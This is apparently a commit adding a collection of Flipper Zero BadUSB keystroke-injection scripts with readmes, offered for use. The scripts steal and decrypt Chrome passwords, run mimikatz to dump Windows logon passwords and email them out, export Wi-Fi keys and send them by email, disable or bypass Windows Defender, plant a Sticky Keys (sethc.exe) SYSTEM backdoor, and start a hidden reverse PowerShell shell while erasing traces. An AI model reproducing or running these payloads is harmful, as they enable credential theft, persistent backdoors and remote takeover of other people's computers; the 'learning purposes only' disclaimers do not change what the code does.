STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/ChromePasswords/ChromePasswords.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Grabs saved Passwords from Chrome
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 5000
6	+	GUI r
7	+	DELAY 250
8	+	STRING powershell
9	+	ENTER
10	+	DELAY 2500
11	+	STRING pwsh
12	+	ENTER
13	+	DELAY 2500
14	+	STRING $d=Add-Type -A System.Security
15	+	ENTER
16	+	STRING $p='public static'
17	+	ENTER
18	+	STRING $g=""")]$p extern"
19	+	ENTER
20	+	STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
21	+	ENTER
22	+	STRING $m="[MarshalAs(UnmanagedType.LP"
23	+	ENTER
24	+	STRING $q='(s,i)'
25	+	ENTER
26	+	STRING $f='(p s,int i)'
27	+	ENTER
28	+	STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
29	+	ENTER
30	+	STRING $u=[Security.Cryptography.ProtectedData]
31	+	ENTER
32	+	STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
33	+	ENTER
34	+	STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
35	+	ENTER
36	+	STRING $l=@()
37	+	ENTER
38	+	STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"\|ConvertFrom-Json).os_crypt.encrypted_key
39	+	ENTER
40	+	STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
41	+	ENTER
42	+	STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
43	+	ENTER
44	+	STRING $c=[W]::B($s,5)
45	+	ENTER
46	+	STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
47	+	ENTER
48	+	STRING $e=[byte[]]::new($k-31)
49	+	ENTER
50	+	STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e\|%{[char]$_})-join''}
51	+	ENTER
52	+	STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
53	+	ENTER
54	+	STRING start-process "chrome" "--headless http://localhost:8000/?$r"
55	+	ENTER
56	+	DELAY 1000
57	+	STRING exit
58	+	ENTER
59	+	DELAY 250
60	+	STRING exit
61	+	ENTER
62	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/ChromePasswords/readme.md

1	+
2	+	# ChromePasswords
3	+	Grabs saved Passwords from Chrome.
4	+
5	+	## How to use?
6	+
7	+	This script is plug and play.
8	+
9	+
10	+	## Features
11	+
12	+	- open powershell
13	+	- save chrome profile
14	+	- paste profile to a file
15	+
16	+	## Feedback
17	+
18	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
19	+
20	+
21	+
22	+
23	+
24	+
25	+	## Support
26	+
27	+	For support, contact me via Discord "UNC0V3R3D#8662".
28	+
29	+
30	+	## Meta
31	+
32	+
33	+	- If you want to sponsor me on Patreon, the link is on my profile.
34	+
35	+
36	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Shows all saved passwords.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 900
6	+	GUI r
7	+	DELAY 1000
8	+	STRING powershell
9	+	ENTER
10	+	DELAY 1000
11	+	STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
12	+	ENTER
13	+	DELAY 5000
14	+	STRING wbpv28821@
15	+	ENTER
16	+	STRING .\WebBrowserPassView.exe
17	+	ENTER
18	+	DELAY 3000
19	+	CTRL A
20	+	CTRL S
21	+	DELAY 1000
22	+	STRING export.html
23	+	TAB
24	+	STRING h
25	+	ENTER
26	+	DELAY 1000
27	+	ALT F4
28	+	DELAY 1000
29	+	STRING Start-Process msedge.exe 'file:///C:/temp/export.html --inprivate'
30	+	ENTER
31	+	DELAY 2000
32	+	ALT TAB
33	+	DELAY 1000
34	+	STRING cd \
35	+	ENTER
36	+	STRING rmdir -R \temp
37	+	ENTER
38	+	STRING EXIT
39	+	ENTER
40	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/Show_Saved_Password/readme.md

1	+
2	+	# Show_Saved_Passwords
3	+	Shows all saved passwords.
4	+
5	+	## How to use?
6	+
7	+	This script is plug and play.
8	+
9	+
10	+	## Features
11	+
12	+	- open powershell
13	+	- download webbrowserview.exe
14	+	- save passwords from webbrowsers
15	+
16	+	## Feedback
17	+
18	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
19	+
20	+
21	+
22	+
23	+
24	+
25	+	## Support
26	+
27	+	For support, contact me via Discord "UNC0V3R3D#8662".
28	+
29	+
30	+	## Meta
31	+
32	+
33	+	- If you want to sponsor me on Patreon, the link is on my profile.
34	+
35	+
36	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/Simple_User_Password_Grabber/Simple_User_Password_Grabber.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Grabs the current Windows User password.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DEFAULT_DELAY 450
6	+	DELAY 1500
7	+	GUI r
8	+	STRING powershell
9	+	CTRL-SHIFT ENTER
10	+	DELAY 600
11	+	ALT y
12	+	STRING Set-MpPreference -ExclusionPath C:\Users
13	+	ENTER
14	+	STRING exit
15	+	ENTER
16	+	GUI r
17	+	STRING cmd
18	+	CTRL-SHIFT ENTER
19	+	DELAY 600
20	+	ALT y
21	+	STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
22	+	ENTER
23	+	DELAY 4000
24	+	STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
25	+	ENTER
26	+	STRING privilege::debug
27	+	ENTER
28	+	STRING sekurlsa::logonPasswords full
29	+	ENTER
30	+	STRING exit
31	+	ENTER
32	+	STRING del %TEMP%\pw.exe
33	+	ENTER
34	+	STRING exit
35	+	ENTER
36	+	GUI r
37	+	STRING powershell
38	+	CTRL-SHIFT ENTER
39	+	DELAY 600
40	+	ALT y
41	+	STRING Remove-MpPreference -ExclusionPath C:\Users
42	+	ENTER
43	+	STRING $SMTPServer = 'smtp.gmail.com'
44	+	ENTER
45	+	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
46	+	ENTER
47	+	STRING $SMTPInfo.EnableSsl = $true
48	+	ENTER
49	+	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
50	+	SHIFT 2
51	+	STRING gmail.com', 'PASSWORDHERE');
52	+	ENTER
53	+	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
54	+	ENTER
55	+	STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
56	+	SHIFT 2
57	+	STRING gmail.com'
58	+	ENTER
59	+	STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
60	+	SHIFT 2
61	+	STRING gmail.com')
62	+	ENTER
63	+	STRING $ReportEmail.Subject = 'Hello from the ducky'
64	+	ENTER
65	+	STRING $ReportEmail.Body = 'Attached is your duck report.'
66	+	ENTER
67	+	STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
68	+	ENTER
69	+	STRING $SMTPInfo.Send($ReportEmail)
70	+	ENTER
71	+	DELAY 4000
72	+	STRING exit
73	+	ENTER
74	+	GUI r
75	+	STRING powershell
76	+	CTRL-SHIFT ENTER
77	+	DELAY 600
78	+	ALT y
79	+	STRING del c:\pwlog.txt
80	+	ENTER
81	+	STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
82	+	ENTER
83	+	STRING exit
84	+	ENTER
85	+	GUI l
86	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/Simple_User_Password_Grabber/readme.md

1	+
2	+	# Simple_user_Password_Grabber
3	+	Grabs the current Windows User password.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	+
9	+	- change link to mimikatz.exe "('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')"
10	+	- change email credential 1 "('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
11	+	- change email credential 2 "gmail.com', 'PASSWORDHERE');"
12	+	- change email credential 3 "$ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
13	+	- change email credential 4 "$ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@"
14	+
15	+
16	+	## Features
17	+
18	+	- open powershell
19	+	- download mimikatz
20	+	- get user password
21	+	- send password to email
22	+
23	+	## Feedback
24	+
25	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
26	+
27	+
28	+
29	+
30	+
31	+
32	+	## Support
33	+
34	+	For support, contact me via Discord "UNC0V3R3D#8662".
35	+
36	+
37	+	## Meta
38	+
39	+
40	+	- If you want to sponsor me on Patreon, the link is on my profile.
41	+
42	+
43	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys/StealWifiKeys.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 500
6	+	WINDOWS d
7	+	DELAY 500
8	+	WINDOWS r
9	+	DELAY 500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 800
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 800
16	+	ALT y
17	+	DELAY 500
18	+	GUI UP
19	+	DELAY 600
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
21	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys/readme.md

1	+
2	+	# StealWifiKeys
3	+	Steals all of the saved Wifi Passwords and stores them into a file.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play. You will need to do the following changes:
8	+
9	+	- change destination path "-DestinationPath C:PUT PATH HERE\ResultsPassword.zip"
10	+
11	+
12	+	## Features
13	+
14	+	- open powershell
15	+	- grab wifi keys
16	+	- store keys to a file
17	+
18	+	## Feedback
19	+
20	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
21	+
22	+
23	+
24	+
25	+
26	+
27	+	## Support
28	+
29	+	For support, contact me via Discord "UNC0V3R3D#8662".
30	+
31	+
32	+	## Meta
33	+
34	+
35	+	- If you want to sponsor me on Patreon, the link is on my profile.
36	+
37	+
38	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys_Email/StealWifiKeys_Email.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DEFAULT_DELAY 600
6	+	DELAY 500
7	+	WINDOWS r
8	+	DELAY 500
9	+	STRING cmd
10	+	ENTER
11	+	DELAY 200
12	+	STRING cd %USERPROFILE% & netsh wlan show profiles \| findstr "All" > a.txt
13	+	ENTER
14	+	STRING echo SETLOCAL EnableDelayedExpansion^
15	+	ENTER
16	+	ENTER
17	+	STRING for /f "tokens=5*" %%i in (a.txt) do (^
18	+	ENTER
19	+	ENTER
20	+	STRING set val=%%i %%j^
21	+	ENTER
22	+	ENTER
23	+	STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
24	+	ENTER
25	+	ENTER
26	+	STRING echo !val!^>^>b.txt) > filter.bat
27	+	ENTER
28	+	STRING filter.bat
29	+	DELAY 300
30	+	ENTER
31	+	STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear \| findstr /c:"Key Content" & echo.) > Log.txt
32	+	ENTER
33	+	DELAY 1000
34	+	STRING exit
35	+	DELAY 500
36	+	ENTER
37	+	DELAY 1000
38	+	WINDOWS r
39	+	DELAY 500
40	+	STRING powershell
41	+	ENTER
42	+	DELAY 1000
43	+	STRING del .\a.txt
44	+	ENTER
45	+	STRING del .\b.txt
46	+	ENTER
47	+	STRING del .\filter.bat
48	+	ENTER
49	+	STRING $SMTPServer = 'smtp-mail.outlook.com'
50	+	ENTER
51	+	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
52	+	ENTER
53	+	STRING $SMTPInfo.EnableSSL = $true
54	+	ENTER
55	+	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')
56	+	ENTER
57	+	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
58	+	ENTER
59	+	STRING $ReportEmail.From = 'YOUR EMAIL'
60	+	ENTER
61	+	STRING $ReportEmail.To.Add('email to send to')
62	+	ENTER
63	+	STRING $ReportEmail.Subject = 'WiFi key grabber'
64	+	ENTER
65	+	STRING $ReportEmail.Body = (Get-Content Log.txt \| out-string)
66	+	ENTER
67	+	STRING $SMTPInfo.Send($ReportEmail)
68	+	ENTER
69	+	DELAY 3000
70	+	STRING del Log.txt
71	+	DELAY 500
72	+	STRING exit
73	+	ENTER
74	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys_Email/readme.md

1	+
2	+	# StealWifiKeys_Email
3	+	Steals all of the saved Wifi Passwords and stores them into a file, then sends the file via email.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	+
9	+	- change credentials "System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')"
10	+	- change credentails "$ReportEmail.From = 'YOUR EMAIL'"
11	+	- change credentials "$ReportEmail.To.Add('email to send to')"
12	+
13	+
14	+	## Features
15	+
16	+	- open powershell
17	+	- grab wifi keys
18	+	- store keys to a file
19	+	- send file via email
20	+
21	+	## Feedback
22	+
23	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
24	+
25	+
26	+
27	+
28	+
29	+
30	+	## Support
31	+
32	+	For support, contact me via Discord "UNC0V3R3D#8662".
33	+
34	+
35	+	## Meta
36	+
37	+
38	+	- If you want to sponsor me on Patreon, the link is on my profile.
39	+
40	+
41	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1000
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	GUI UP
19	+	DELAY 900
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here

■ ■ ■ ■ ■ ■

BadUsb-Collection/PasswordStuff/StealWifiKeys_onUSB/readme.md

1	+
2	+	# StealWifiKeys_onUSB
3	+	Steals all of the saved Wifi Passwords and stores them into a file, then puts the file on a usb device connected to the target pc.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	+
9	+	- change path to the usb device "-DestinationPath File path on USB device here"
10	+
11	+
12	+	## Features
13	+
14	+	- open powershell
15	+	- grab wifi keys
16	+	- store keys to a file on a usb device
17	+
18	+	## Feedback
19	+
20	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
21	+
22	+
23	+
24	+
25	+
26	+
27	+	## Support
28	+
29	+	For support, contact me via Discord "UNC0V3R3D#8662".
30	+
31	+
32	+	## Meta
33	+
34	+
35	+	- If you want to sponsor me on Patreon, the link is on my profile.
36	+
37	+
38	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
3	+	REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
4	+	REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
5	+	REM Version: 1.0
6	+	REM Category: Remote_Access
7	+	REM plug in second USB in before the Flipper
8	+	DELAY 3000
9	+	CONTROL ESCAPE
10	+	DELAY 500
11	+	STRING notepad
12	+	DELAY 250
13	+	ENTER
14	+	DELAY 750
15	+	STRING @echo off
16	+	ENTER
17	+	STRING :init
18	+	ENTER
19	+	STRING setlocal DisableDelayedExpansion
20	+	ENTER
21	+	STRING set cmdInvoke=1
22	+	ENTER
23	+	STRING set winSysFolder=System32
24	+	ENTER
25	+	STRING set "batchPath=%~0"
26	+	ENTER
27	+	STRING for %%k in (%0) do set batchName=%%~nk
28	+	ENTER
29	+	STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
30	+	ENTER
31	+	STRING setlocal EnableDelayedExpansion
32	+	ENTER
33	+	STRING :checkPrivileges
34	+	ENTER
35	+	STRING NET FILE 1>NUL 2>NUL
36	+	ENTER
37	+	STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
38	+	ENTER
39	+	STRING :getPrivileges
40	+	ENTER
41	+	STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
42	+	ENTER
43	+	STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
44	+	ENTER
45	+	STRING echo args = "ELEV " >> "%TEMPVBS%"
46	+	ENTER
47	+	STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
48	+	ENTER
49	+	STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
50	+	ENTER
51	+	STRING echo Next>> "%TEMPVBS%"
52	+	ENTER
53	+	STRING if '%cmdInvoke%'=='1' goto InvokeCmd
54	+	ENTER
55	+	STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
56	+	ENTER
57	+	STRING goto ExecElevation
58	+	ENTER
59	+	STRING :InvokeCmd
60	+	ENTER
61	+	STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
62	+	ENTER
63	+	STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
64	+	ENTER
65	+	STRING :ExecElevation
66	+	ENTER
67	+	STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
68	+	ENTER
69	+	STRING exit /B
70	+	ENTER
71	+	STRING :gotPrivileges
72	+	ENTER
73	+	STRING setlocal & cd /d "%~dp0."
74	+	ENTER
75	+	STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
76	+	ENTER
77	+	STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
78	+	ENTER
79	+	STRING cls
80	+	ENTER
81	+	STRING echo Payload Install Failed
82	+	ENTER
83	+	STRING pause
84	+	ENTER
85	+	STRING :end
86	+	ENTER
87	+	STRING del /F /Q "%~0" && exit
88	+	CONTROL s
89	+	DELAY 500
90	+	STRING %temp%\run.bat
91	+	TAB
92	+	STRING a
93	+	ENTER
94	+	DELAY 250
95	+	ALT F4
96	+	DELAY 250
97	+	CONTROL ESCAPE
98	+	DELAY 500
99	+	STRING %temp%\run.bat
100	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/CommandLineBackdoor/readme.md

1	+
2	+	# CommandLineBackdoor
3	+	This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
8	+
9	+
10	+	## Features
11	+
12	+	- x
13	+
14	+	## Feedback
15	+
16	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
17	+
18	+
19	+
20	+
21	+
22	+
23	+	## Support
24	+
25	+	For support, contact me via Discord "UNC0V3R3D#8662".
26	+
27	+
28	+	## Meta
29	+
30	+
31	+	- If you want to sponsor me on Patreon, the link is on my profile.
32	+
33	+
34	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/ReversePowershell/ReversePowershell.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
3	+	REM Version: 1.0
4	+	REM Category: Remote_Access
5	+	DELAY 750
6	+	GUI r
7	+	DELAY 1000
8	+	STRING powershell Start-Process notepad -Verb runAs
9	+	ENTER
10	+	DELAY 750
11	+	ALT y
12	+	DELAY 750
13	+	ENTER
14	+	ALT SPACE
15	+	DELAY 1000
16	+	STRING m
17	+	DELAY 1000
18	+	DOWNARROW
19	+	REPEAT 100
20	+	ENTER
21	+	STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255\|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 \| Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
22	+	ENTER
23	+	DELAY 750
24	+	STRING Set-MpPreference -DisableRealtimeMonitoring $true
25	+	DELAY 500
26	+	ENTER
27	+	DELAY 750
28	+	STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
29	+	ENTER
30	+	STRING Remove-Item $MyINvocation.InvocationName
31	+	ENTER
32	+	CTRL s
33	+	DELAY 1000
34	+	STRING C:\Windows\config-34593.ps1
35	+	ENTER
36	+	DELAY 1000
37	+	ALT F4
38	+	DELAY 750
39	+	GUI r
40	+	DELAY 750
41	+	STRING powershell Start-Process cmd -Verb runAs
42	+	ENTER
43	+	DELAY 750
44	+	ALT y
45	+	DELAY 1000
46	+	STRING mode con:cols=14 lines=1
47	+	ENTER
48	+	ALT SPACE
49	+	DELAY 750
50	+	STRING m
51	+	DELAY 750
52	+	DOWNARROW
53	+	REPEAT 100
54	+	ENTER
55	+	STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
56	+	ENTER
57	+	DELAY 750
58	+	STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
59	+	ENTER
60	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Remote-Access/ReversePowershell/readme.md

1	+
2	+	# ReversePowershell
3	+	This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
4	+
5	+	## How to use?
6	+
7	+	This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
8	+
9	+
10	+	## Features
11	+
12	+	- x
13	+
14	+	## Feedback
15	+
16	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
17	+
18	+
19	+
20	+
21	+
22	+
23	+	## Support
24	+
25	+	For support, contact me via Discord "UNC0V3R3D#8662".
26	+
27	+
28	+	## Meta
29	+
30	+
31	+	- If you want to sponsor me on Patreon, the link is on my profile.
32	+
33	+
34	+

Add files via upload